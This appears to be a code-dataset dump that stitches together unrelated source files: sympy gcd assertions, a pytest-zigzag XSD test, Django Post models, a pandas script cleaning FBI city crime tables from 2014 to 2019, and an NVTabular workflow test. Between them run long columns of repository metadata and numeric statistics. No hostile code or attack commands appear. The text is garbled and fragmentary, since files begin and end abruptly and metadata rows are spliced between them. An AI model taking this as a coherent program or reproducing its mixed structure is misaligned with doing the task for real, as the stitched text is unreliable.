assert_equal("\\operatorname{gcd}(2.4,3.6,0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
assert_equal("\\operatorname{gcd}(\\sqrt{3},\\sqrt{2}, \\sqrt{100})", gcd(sqrt(3), gcd(sqrt(2), sqrt(100))))
assert_equal("\\operatorname{gcd}(1E12, 1E6,1E3, 10)", igcd(Rational('1E12'), Rational('1E6'), Rational('1E3'), 10))
| 61.753086
| 181
| 0.609656
| 1,591
| 10,004
| 3.744815
| 0.062225
| 0.234475
| 0.138637
| 0.257469
| 0.910205
| 0.866398
| 0.842397
| 0.816885
| 0.688822
| 0.592816
| 0
| 0.17032
| 0.12435
| 10,004
| 161
| 182
| 62.136646
| 0.509817
| 0
| 0
| 0.057554
| 0
| 0.014388
| 0.357557
| 0.167533
| 0
| 0
| 0
| 0
| 0.913669
| 1
| 0.05036
| false
| 0
| 0.021583
| 0
| 0.071942
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a4a2855086a0c8a80eae961e7125a55aa421eccc
| 4,196
|
py
|
Python
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 1
|
2021-01-19T23:59:54.000Z
|
2021-01-19T23:59:54.000Z
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 3
|
2018-08-23T19:44:46.000Z
|
2019-02-21T22:04:29.000Z
|
tests/test_xsd.py
|
ryan-rs/pytest-zigzag
|
7116357ab680a5a9bac47af3ac428f706cee0e93
|
[
"Apache-2.0"
] | 3
|
2018-08-17T00:37:15.000Z
|
2018-08-21T14:54:56.000Z
|
# -*- coding: utf-8 -*-
"""Test cases for the 'get_xsd' utility function for retrieving the XSD for the project."""
# ======================================================================================================================
# Imports
# ======================================================================================================================
from __future__ import absolute_import
from lxml import etree
# noinspection PyProtectedMember
# noinspection PyPackageRequirements
from zigzag.xml_parsing_facade import XmlParsingFacade
from tests.conftest import run_and_parse
# ======================================================================================================================
# Tests
# ======================================================================================================================
def test_happy_path_asc(testdir, properly_decorated_test_function, mocker, simple_test_config):
"""Verify that 'get_xsd' returns an XSD stream that can be used to validate JUnitXML."""
# Mock
zz = mocker.MagicMock()
xmlpf = XmlParsingFacade(zz)
# Setup
testdir.makepyfile(properly_decorated_test_function.format(test_name='test_happy_path',
test_id='123e4567-e89b-12d3-a456-426655440000',
jira_id='ASC-123'))
args = ["--pytest-zigzag-config", simple_test_config]
xml_doc = run_and_parse(testdir, 0, args)[0].xml_doc
# noinspection PyProtectedMember
xmlschema = etree.XMLSchema(etree.parse(xmlpf._get_xsd()))
# Test
xmlschema.assertValid(xml_doc)
def test_happy_path_mk8s(testdir, properly_decorated_test_function, mocker, mk8s_test_config):
"""Verify that 'get_xsd' returns an XSD stream that can be used to validate JUnitXML when configured with mk8s."""
# Mock
zz = mocker.MagicMock()
xmlpf = XmlParsingFacade(zz)
# Setup
testdir.makepyfile(properly_decorated_test_function.format(test_name='test_happy_path',
test_id='123e4567-e89b-12d3-a456-426655440000',
jira_id='ASC-123'))
args = ["--pytest-zigzag-config", mk8s_test_config]
xml_doc = run_and_parse(testdir, 0, args)[0].xml_doc
# noinspection PyProtectedMember
xmlschema = etree.XMLSchema(etree.parse(xmlpf._get_xsd()))
# Test
xmlschema.assertValid(xml_doc)
def test_multiple_jira_references(testdir, mocker, simple_test_config):
"""Verify that 'get_xsd' returns an XSD stream when a testcase is decorated Jira mark with multiple
arguments for the 'asc' CI environment.
"""
# Mock
zz = mocker.MagicMock()
xmlpf = XmlParsingFacade(zz)
# Setup
testdir.makepyfile("""
import pytest
@pytest.mark.jira('ASC-123', 'ASC-124')
@pytest.mark.test_id('123e4567-e89b-12d3-a456-426655440000')
def test_xsd():
pass
""")
args = ["--pytest-zigzag-config", simple_test_config]
xml_doc = run_and_parse(testdir, 0, args)[0].xml_doc
# noinspection PyProtectedMember
xmlschema = etree.XMLSchema(etree.parse(xmlpf._get_xsd()))
# Test
xmlschema.assertValid(xml_doc)
def test_multiple_jira_references_mk8s(testdir, mocker, mk8s_test_config):
"""Verify that 'get_xsd' returns an XSD stream when a testcase is decorated Jira mark with multiple
arguments for the 'mk8s' CI environment.
"""
# Mock
zz = mocker.MagicMock()
xmlpf = XmlParsingFacade(zz)
# Setup
testdir.makepyfile("""
import pytest
@pytest.mark.jira('ASC-123', 'ASC-124')
@pytest.mark.test_id('123e4567-e89b-12d3-a456-426655440000')
def test_xsd():
pass
""")
args = ["--pytest-zigzag-config", mk8s_test_config]
xml_doc = run_and_parse(testdir, 0, args)[0].xml_doc
# noinspection PyProtectedMember
xmlschema = etree.XMLSchema(etree.parse(xmlpf._get_xsd()))
# Test
xmlschema.assertValid(xml_doc)
| 36.807018
| 120
| 0.57245
| 434
| 4,196
| 5.31106
| 0.209677
| 0.031236
| 0.023861
| 0.050325
| 0.84295
| 0.84295
| 0.811714
| 0.811714
| 0.811714
| 0.811714
| 0
| 0.044054
| 0.226406
| 4,196
| 113
| 121
| 37.132743
| 0.666051
| 0.314347
| 0
| 0.846154
| 0
| 0
| 0.232823
| 0.119616
| 0
| 0
| 0
| 0
| 0.076923
| 1
| 0.076923
| false
| 0.038462
| 0.115385
| 0
| 0.192308
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f11ca51eaa1e46ea2b9a342fd64d6b4e9f22780d
| 621
|
py
|
Python
|
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | 1
|
2018-10-02T04:46:41.000Z
|
2018-10-02T04:46:41.000Z
|
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | null | null | null |
hurry/models.py
|
hugefiver/naiveindex
|
a358f9169168d5c7c790a563b0c93522ababdd8f
|
[
"BSD-3-Clause"
] | 1
|
2019-06-17T08:34:12.000Z
|
2019-06-17T08:34:12.000Z
|
from django.db import models
class Post(models.Model):
title = models.CharField('Title', max_length=20, default='')
create_date = models.DateField('CreateDate', auto_now_add=True)
change_date = models.DateField('ChangeDate', auto_now=True)
main_text = models.TextField('MainText')
class PinPost(models.Model):
title = models.CharField('Title', max_length=20, default='')
pin = models.IntegerField('Pin', default=1)
create_date = models.DateField('CreateDate', auto_now_add=True)
change_date = models.DateField('ChangeDate', auto_now=True)
main_text = models.TextField('MainText')
| 34.5
| 67
| 0.726248
| 79
| 621
| 5.531646
| 0.405063
| 0.091533
| 0.173913
| 0.100687
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0.823799
| 0
| 0.009328
| 0.136876
| 621
| 17
| 68
| 36.529412
| 0.80597
| 0
| 0
| 0.666667
| 0
| 0
| 0.11129
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
f189c7feea6052514ea214148b48ad9dff98af07
| 76
|
py
|
Python
|
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
tasdikrahman/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2017-04-16T06:59:02.000Z
|
2017-04-16T06:59:02.000Z
|
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | null | null | null |
accepted/chennaipy/october/samplecode/absoluteimports/__init__.py
|
prodicus/talks
|
bba44283e149ab27fb8cc2f6f8644adf9f2c8a11
|
[
"MIT"
] | 1
|
2019-10-26T00:28:07.000Z
|
2019-10-26T00:28:07.000Z
|
# absoluteimports/__init__.py
print("inside absoluteimports/__init__.py")
| 15.2
| 43
| 0.802632
| 8
| 76
| 6.625
| 0.625
| 0.716981
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 76
| 4
| 44
| 19
| 0.757143
| 0.355263
| 0
| 0
| 0
| 0
| 0.73913
| 0.586957
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 10
|
74b7e6749fb65b6903ee37acac377f33eb09591e
| 11,104
|
py
|
Python
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 1
|
2021-02-18T04:39:36.000Z
|
2021-02-18T04:39:36.000Z
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 7
|
2021-02-02T02:43:47.000Z
|
2021-02-21T06:02:02.000Z
|
scripts/crime/crime.py
|
RMDircio/cityspire-a-ds
|
979ffaec9e92c0042b88a37d834261dbd98f9177
|
[
"MIT"
] | 4
|
2021-01-21T02:38:50.000Z
|
2021-03-03T02:17:37.000Z
|
import pandas as pd
import numpy as np
crime_2019 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2019.xls')
crime_2018 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2018.xls')
crime_2017 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2017.xls')
crime_2016 = pd.read_excel('./data/Table_6_Offenses_Known_to_Law_Enforcement_by_State_by_City_2016.xls')
crime_2015 = pd.read_excel('./data/Table_8_Offenses_Known_to_Law_Enforcement_by_State_by_City_2015.xls')
crime_2014 = pd.read_excel('./data/table-8.xls')
def clean_2019(df):
'''
simple cleaning function to preprcess 2019 data to for modeling
df: input data frame
'''
# deleting last 8 rows due to useles info
df = df.drop(df.tail(8).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# Alabama naming fix
df['State'] = df['State'].str.replace('ALABAMA3', 'ALABAMA')
df.columns = df.columns.str.replace('\n',' ' )
df = df.rename(columns={'Arson2':'Arson'})
# droping unwanted columns
df.drop(['Rape1', 'Murder and nonnegligent manslaughter', 'Robbery', 'Aggravated assault',
'Burglary','Motor vehicle theft', 'Arson', 'Larceny- theft'], axis=1, inplace=True)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2019
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
def clean_2018(df):
'''
simple cleaning function to preprcess 2018 data to for modeling
df: input data frame
'''
# deleting last 10 rows due to useles info
df = df.drop(df.tail(10).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# state naming fixing
df['State'] = df['State'].str.replace('IOWA7', 'IOWA')
df['State'] = df['State'].str.replace('NORTH CAROLINA8', 'NORTH CAROLINA')
df.columns = df.columns.str.replace('\n',' ' )
# droping unwanted columns
df.drop(['Rape', 'Murder and nonnegligent manslaughter', 'Robbery', 'Aggravated assault',
'Burglary','Motor vehicle theft', 'Arson', 'Larceny- theft'], axis=1, inplace=True)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2018
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
def clean_2017(df):
'''
simple cleaning function to preprcess 2017 data to for modeling
df: input data frame
'''
# deleting last 10 rows due to useles info
df = df.drop(df.tail(10).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# fix formating of headers
df.columns = df.columns.str.replace('\n',' ' )
# # droping unwanted columns
drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
df = df.drop(df.columns.difference(drop_list), axis=1)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2017
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
def clean_2016(df):
'''
simple cleaning function to preprcess 2016 data to for modeling
df: input data frame
'''
# deleting last 10 rows due to useles info
df = df.drop(df.tail(11).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# fix formating of headers
df.columns = df.columns.str.replace('\n',' ' )
# # droping unwanted columns
drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
df = df.drop(df.columns.difference(drop_list), axis=1)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2016
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
def clean_2015(df):
'''
simple cleaning function to preprcess 2015 data to for modeling
df: input data frame
'''
# deleting last 10 rows due to useles info
df = df.drop(df.tail(10).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# NJ naming fix
df['State'] = df['State'].str.replace('NEW JERSEY9', 'NEW JERSEY')
# fix formating of headers
df.columns = df.columns.str.replace('\n',' ' )
# # droping unwanted columns
drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
df = df.drop(df.columns.difference(drop_list), axis=1)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2015
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
def clean_2014(df):
'''
simple cleaning function to preprcess 2014 data to for modeling
df: input data frame
'''
# deleting last 17 rows due to useles info
df = df.drop(df.tail(17).index)
# front fill states
df['State'] = df['State'].fillna(method='ffill')
temp = df['State'].str.split("-", n=1, expand=True)
df['State'] = temp[0]
# GA naming fix
df['State'] = df['State'].str.replace('GEORGIA7', 'GEORGIA')
# fix formating of headers
df.columns = df.columns.str.replace('\n',' ' )
# # droping unwanted columns
drop_list = ['State', 'City', 'Population', 'Violent crime', 'Property crime']
df = df.drop(df.columns.difference(drop_list), axis=1)
# lowercasing whole df
df = df.applymap(lambda s:s.lower() if type(s) == str else s)
# dealing with NaN's
zeros = ['Violent crime', 'Property crime']
df[zeros] = df[zeros].fillna(value=0)
# removing unessary text from cities
df['City'] = df['City'].str.replace(' County Police Department', '')
df['City'] = df['City'].str.replace(' Police Department', '')
df['City'] = df['City'].str.replace(' County', '')
df['City'] = df['City'].str.replace('7', '')
df['City'] = df['City'].str.replace('5', '')
df['City'] = df['City'].str.replace('3', '')
df['City'] = df['City'].str.replace("'s", '')
# adding year to df
df['year'] = 2014
# Add City, State
df['City, State'] = df.City + ", " + df.State
print(df.head(3))
return df
crime_2014 = clean_2014(crime_2014)
crime_2015 = clean_2015(crime_2015)
crime_2016 = clean_2016(crime_2016)
crime_2017 = clean_2017(crime_2017)
crime_2018 = clean_2018(crime_2018)
crime_2019 = clean_2019(crime_2019)
# create csv's
crime_2019.to_csv('crime_2019.csv')
crime_2018.to_csv('crime_2018.csv')
crime_2017.to_csv('crime_2017.csv')
crime_2016.to_csv('crime_2016.csv')
crime_2015.to_csv('crime_2015.csv')
crime_2014.to_csv('crime_2014.csv')
| 33.957187
| 104
| 0.558988
| 1,457
| 11,104
| 4.179822
| 0.100206
| 0.094581
| 0.063054
| 0.082759
| 0.8867
| 0.877833
| 0.83202
| 0.827258
| 0.811002
| 0.804105
| 0
| 0.039093
| 0.26513
| 11,104
| 326
| 105
| 34.06135
| 0.70723
| 0.167777
| 0
| 0.727848
| 0
| 0
| 0.237184
| 0.041143
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037975
| false
| 0
| 0.012658
| 0
| 0.088608
| 0.037975
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2d03608e766f4c2bb53e71a36496565b2d1542dd
| 15,493
|
py
|
Python
|
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/test_workflow.py
|
benfred/NVTabular
|
5ab6d557868ac01eda26e9725a1a6e5bf7eda007
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import glob
import math
import cudf
import numpy as np
import pytest
from cudf.tests.utils import assert_eq
import nvtabular as nvt
import nvtabular.io
import nvtabular.ops as ops
from tests.conftest import allcols_csv, cleanup, mycols_csv, mycols_pq
@cleanup
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
@pytest.mark.parametrize("op_columns", [["x"], None])
def test_gpu_workflow_api(tmpdir, datasets, dump, gpu_memory_frac, engine, op_columns):
paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
if engine == "parquet":
df1 = cudf.read_parquet(paths[0])[mycols_pq]
df2 = cudf.read_parquet(paths[1])[mycols_pq]
else:
df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
df = cudf.concat([df1, df2], axis=0)
df["id"] = df["id"].astype("int64")
if engine == "parquet":
cat_names = ["name-cat", "name-string"]
columns = mycols_pq
else:
cat_names = ["name-string"]
columns = mycols_csv
cont_names = ["x", "y", "id"]
label_name = ["label"]
processor = nvt.Workflow(
cat_names=cat_names, cont_names=cont_names, label_name=label_name, to_cpu=False,
)
processor.add_feature([ops.ZeroFill(columns=op_columns), ops.LogOp()])
processor.add_preprocess(ops.Normalize())
processor.add_preprocess(ops.Categorify())
processor.finalize()
data_itr = nvtabular.io.GPUDatasetIterator(
paths,
columns=columns,
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
names=allcols_csv,
)
processor.update_stats(data_itr)
if dump:
config_file = tmpdir + "/temp.yaml"
processor.save_stats(config_file)
processor.clear_stats()
processor.load_stats(config_file)
def get_norms(tar: cudf.Series):
gdf = tar.fillna(0)
gdf = gdf * (gdf >= 0).astype("int")
gdf = np.log(gdf + 1)
return gdf
# Check mean and std - No good right now we have to add all other changes; Zerofill, Log
if not op_columns:
assert math.isclose(get_norms(df.y).mean(), processor.stats["means"]["y"], rel_tol=1e-1,)
assert math.isclose(get_norms(df.y).std(), processor.stats["stds"]["y"], rel_tol=1e-1,)
assert math.isclose(get_norms(df.x).mean(), processor.stats["means"]["x"], rel_tol=1e-1,)
assert math.isclose(get_norms(df.x).std(), processor.stats["stds"]["x"], rel_tol=1e-1,)
# Check that categories match
if engine == "parquet":
cats_expected0 = df["name-cat"].unique().values_to_string()
cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats0 == ["None"] + cats_expected0
cats_expected1 = df["name-string"].unique().values_to_string()
cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats1 == ["None"] + cats_expected1
# Write to new "shuffled" and "processed" dataset
processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
data_itr_2 = nvtabular.io.GPUDatasetIterator(
glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
)
df_pp = None
for chunk in data_itr_2:
df_pp = cudf.concat([df_pp, chunk], axis=0) if df_pp else chunk
if engine == "parquet":
assert df_pp["name-cat"].dtype == "int64"
assert df_pp["name-string"].dtype == "int64"
num_rows, num_row_groups, col_names = cudf.io.read_parquet_metadata(str(tmpdir) + "/_metadata")
assert num_rows == len(df_pp)
return processor.ds_exports
@pytest.mark.parametrize("batch", [0, 100, 1000])
def test_gpu_file_iterator_parquet(datasets, batch):
paths = glob.glob(str(datasets["parquet"]) + "/*.parquet")
df_expect = cudf.read_parquet(paths[0], columns=mycols_pq)
df_itr = cudf.DataFrame()
data_itr = nvtabular.io.GPUFileIterator(
paths[0], batch_size=batch, gpu_memory_frac=0.01, columns=mycols_pq
)
for data_gd in data_itr:
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("dskey", ["csv", "csv-no-header"])
def test_gpu_file_iterator_csv(datasets, batch, dskey):
paths = glob.glob(str(datasets[dskey]) + "/*.csv")
names = allcols_csv if dskey == "csv-no-header" else None
df_expect = cudf.read_csv(paths[0], header=False, names=names)[mycols_csv]
df_expect["id"] = df_expect["id"].astype("int64")
df_itr = cudf.DataFrame()
data_itr = nvtabular.io.GPUFileIterator(
paths[0], batch_size=batch, gpu_memory_frac=0.01, columns=mycols_csv, names=names,
)
for data_gd in data_itr:
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
def test_gpu_dataset_iterator_parquet(datasets, batch):
paths = glob.glob(str(datasets["parquet"]) + "/*.parquet")
df_expect = cudf.read_parquet(paths[0], columns=mycols_pq)
df_expect = cudf.concat([df_expect, cudf.read_parquet(paths[1], columns=mycols_pq)], axis=0)
df_itr = cudf.DataFrame()
data_itr = nvtabular.io.GPUDatasetIterator(
paths, batch_size=batch, gpu_memory_frac=0.01, columns=mycols_pq
)
for data_gd in data_itr:
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@pytest.mark.parametrize("batch", [0, 100, 1000])
@pytest.mark.parametrize("dskey", ["csv", "csv-no-header"])
def test_gpu_dataset_iterator_csv(datasets, batch, dskey):
paths = glob.glob(str(datasets[dskey]) + "/*.csv")
df_expect1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
df_expect2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
df_expect = cudf.concat([df_expect1, df_expect2], axis=0)
df_expect["id"] = df_expect["id"].astype("int64")
df_itr = cudf.DataFrame()
data_itr = nvtabular.io.GPUDatasetIterator(
paths, batch_size=batch, gpu_memory_frac=0.01, columns=mycols_csv, names=allcols_csv,
)
for data_gd in data_itr:
df_itr = cudf.concat([df_itr, data_gd], axis=0) if df_itr else data_gd
assert_eq(df_itr.reset_index(drop=True), df_expect.reset_index(drop=True))
@cleanup
@pytest.mark.parametrize("gpu_memory_frac", [0.01, 0.1])
@pytest.mark.parametrize("engine", ["parquet", "csv", "csv-no-header"])
@pytest.mark.parametrize("dump", [True, False])
def test_gpu_workflow(tmpdir, datasets, dump, gpu_memory_frac, engine):
paths = glob.glob(str(datasets[engine]) + "/*." + engine.split("-")[0])
if engine == "parquet":
df1 = cudf.read_parquet(paths[0])[mycols_pq]
df2 = cudf.read_parquet(paths[1])[mycols_pq]
else:
df1 = cudf.read_csv(paths[0], header=False, names=allcols_csv)[mycols_csv]
df2 = cudf.read_csv(paths[1], header=False, names=allcols_csv)[mycols_csv]
df = cudf.concat([df1, df2], axis=0)
df["id"] = df["id"].astype("int64")
if engine == "parquet":
cat_names = ["name-cat", "name-string"]
columns = mycols_pq
else:
cat_names = ["name-string"]
columns = mycols_csv
cont_names = ["x", "y", "id"]
label_name = ["label"]
config = nvt.workflow.get_new_config()
config["FE"]["continuous"] = [ops.ZeroFill()]
config["PP"]["continuous"] = [[ops.ZeroFill(), ops.Normalize()]]
config["PP"]["categorical"] = [ops.Categorify()]
processor = nvt.Workflow(
cat_names=cat_names,
cont_names=cont_names,
label_name=label_name,
config=config,
to_cpu=False,
)
data_itr = nvtabular.io.GPUDatasetIterator(
paths,
columns=columns,
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
names=allcols_csv,
)
processor.update_stats(data_itr)
if dump:
config_file = tmpdir + "/temp.yaml"
processor.save_stats(config_file)
processor.clear_stats()
processor.load_stats(config_file)
def get_norms(tar: cudf.Series):
gdf = tar.fillna(0)
gdf = gdf * (gdf >= 0).astype("int")
return gdf
assert math.isclose(get_norms(df.x).mean(), processor.stats["means"]["x"], rel_tol=1e-4)
assert math.isclose(get_norms(df.y).mean(), processor.stats["means"]["y"], rel_tol=1e-4)
# assert math.isclose(get_norms(df.id).mean(),
# processor.stats["means"]["id_ZeroFill_LogOp"], rel_tol=1e-4)
assert math.isclose(get_norms(df.x).std(), processor.stats["stds"]["x"], rel_tol=1e-3)
assert math.isclose(get_norms(df.y).std(), processor.stats["stds"]["y"], rel_tol=1e-3)
# assert math.isclose(get_norms(df.id).std(),
# processor.stats["stds"]["id_ZeroFill_LogOp"], rel_tol=1e-3)
# Check that categories match
if engine == "parquet":
cats_expected0 = df["name-cat"].unique().values_to_string()
cats0 = processor.stats["encoders"]["name-cat"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats0 == ["None"] + cats_expected0
cats_expected1 = df["name-string"].unique().values_to_string()
cats1 = processor.stats["encoders"]["name-string"].get_cats().values_to_string()
# adding the None entry as a string because of move from gpu
assert cats1 == ["None"] + cats_expected1
# Write to new "shuffled" and "processed" dataset
processor.write_to_dataset(tmpdir, data_itr, nfiles=10, shuffle=True, apply_ops=True)
data_itr_2 = nvtabular.io.GPUDatasetIterator(
glob.glob(str(tmpdir) + "/ds_part.*.parquet"),
use_row_groups=True,
gpu_memory_frac=gpu_memory_frac,
)
df_pp = None
